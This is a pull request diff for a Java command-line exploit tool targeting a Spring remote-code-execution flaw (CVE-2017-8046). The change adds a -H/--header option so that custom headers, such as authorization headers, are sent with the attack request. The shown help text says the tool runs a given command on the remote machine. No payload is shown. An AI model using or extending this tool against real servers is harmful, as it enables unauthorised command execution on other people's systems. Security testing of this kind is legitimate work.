### PR TITLE
Add support for custom HTTP headers

### DIFF
--- a/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
+++ b/src/main/java/com/afs/exploit/spring/SpringBreakCve20178046.java
@@ -18,6 +18,8 @@ import java.io.IOException;
 import java.io.InputStreamReader;
 import java.net.URI;
 import java.net.URISyntaxException;
+import java.util.ArrayList;
+import java.util.List;
 
 import org.apache.http.HttpResponse;
 import org.apache.http.client.HttpClient;
@@ -135,6 +137,11 @@ public class SpringBreakCve20178046 {
     private boolean verbose;
 
     /**
+     * Custom headers that will be passed.
+     */
+    private List<String> customHeaders = new ArrayList<String>();
+
+    /**
      * Default constructor.
      */
     public SpringBreakCve20178046() {
@@ -249,6 +256,13 @@ public class SpringBreakCve20178046 {
         if (!isEmpty(this.cookies)) {
             patch.setHeader("Cookie", this.cookies);
         }
+        if(!customHeaders.isEmpty()) {
+            for(String header : this.customHeaders) {
+                String key = header.split(":")[0];
+                String value = header.split(":")[1];
+                patch.setHeader(key, value);
+            }
+        }
         patch.setEntity(new StringEntity(payload));
 
         // Response string.
@@ -362,6 +376,14 @@ public class SpringBreakCve20178046 {
         this.cookies = cookies;
     }
 
+    public void setCustomHeader(String customHeader) {
+        if (customHeader != null && customHeader.contains(":") &&
+            !customHeader.startsWith(":") && !customHeader.endsWith(":")) {
+            customHeader = customHeader.trim();
+            this.customHeaders.add(customHeader);
+        }
+    }
+
     public boolean isCleanResponse() {
         return cleanResponse;
     }
@@ -396,6 +418,8 @@ public class SpringBreakCve20178046 {
         System.out.println("      The command that will be executed on the remote machine.");
         System.out.println("   --cookies [cookies]");
         System.out.println("      Optional. Cookies passed into the request, e.g. authentication cookies.");
+        System.out.println("   -H, --header [customHeader]");
+        System.out.println("      Optional. Custom header passed into the request, e.g. authorization header.");
         System.out.println("   --clean");
         System.out.println("      Optional. Removes error messages in output due to the usage of the");
         System.out.println("      exploit. It could hide error messages if the request fails for other reasons.");
@@ -447,6 +471,11 @@ public class SpringBreakCve20178046 {
                         }
                         o.setCookies(args[++i]);
 
+                    } else if ("-H".equals(p) || "--header".equals(p)) {
+                        if (i + 1 > args.length - 1) {
+                            throw new IllegalArgumentException("Custom header must be passed, if specified.");
+                        }
+                        o.setCustomHeader(args[++i]);
                     } else if ("--clean".equals(p)) {
                         o.setCleanResponse(true);
                     } else if ("--error-stream".equals(p)) {


### PR DESCRIPTION
This patch allows adding custom headers into HTTP requests, such as authorization headers.